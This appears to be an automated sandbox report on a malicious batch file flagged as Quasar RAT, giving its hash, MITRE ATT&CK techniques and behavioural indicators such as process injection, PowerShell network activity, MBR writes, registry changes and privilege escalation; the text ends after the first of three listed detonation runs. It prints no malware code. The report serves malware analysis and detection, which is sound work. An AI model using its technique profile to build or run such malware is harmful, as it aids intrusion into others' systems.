Malware Analysis Report

2024-08-06 11:28

Sample ID 240611-v77x2avend
Target Uni.bat
SHA256 d34225f65c10acac82f381cf0f4281b2bc691afb2b72a1331acee94ca10e5c1c
Tags
quasar slave execution spyware trojan bootkit persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d34225f65c10acac82f381cf0f4281b2bc691afb2b72a1331acee94ca10e5c1c

Threat Level: Known bad

The file Uni.bat was found to be: Known bad.

Malicious Activity Summary

quasar slave execution spyware trojan bootkit persistence

Quasar RAT

Suspicious use of NtCreateUserProcessOtherParentProcess

Quasar payload

Sets service image path in registry

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Checks BIOS information in registry

Executes dropped EXE

Enumerates connected drives

Looks up external IP address via web service

Writes to the Master Boot Record (MBR)

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Windows directory

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of SendNotifyMessage

Suspicious use of UnmapMainImage

Runs ping.exe

Enumerates system info in registry

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Checks processor information in registry

Uses Task Scheduler COM API

Modifies registry class

Modifies data under HKEY_USERS

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Command and Scripting Interpreter
T1059
PowerShell
T1059.001
Persistence
TA0003
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Pre-OS Boot
T1542
Bootkit
T1542.003
Privilege Escalation
TA0004
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Defense Evasion
TA0005
Modify Registry
T1112
Pre-OS Boot
T1542
Bootkit
T1542.003
Credential Access
TA0006
Discovery
TA0007
Query Registry
T1012
System Information Discovery
T1082
Remote System Discovery
T1018
Peripheral Device Discovery
T1120
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-06-11 17:38

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-11 17:38

Reported

2024-06-11 17:44

Platform

win10-20240404-en

Max time kernel

300s

Max time network

263s

Command Line

winlogon.exe

Signatures

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 5052 created 564 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\system32\wbem\wmiprvse.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Install.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 c:\windows\system32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9C237ECACBCB4101A3BE740DF0E53F83 c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 c:\windows\system32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 c:\windows\system32\svchost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 5052 set thread context of 2788 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe

Enumerates physical storage devices

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed c:\windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs c:\windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA c:\windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust c:\windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates c:\windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs c:\windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs c:\windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates c:\windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates c:\windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople c:\windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates c:\windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root c:\windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates c:\windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs c:\windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs c:\windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates c:\windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs c:\windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot c:\windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs c:\windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs c:\windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople c:\windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust c:\windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs c:\windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 11 Jun 2024 17:40:22 GMT" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs c:\windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs c:\windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs c:\windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1212 wrote to memory of 1132 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
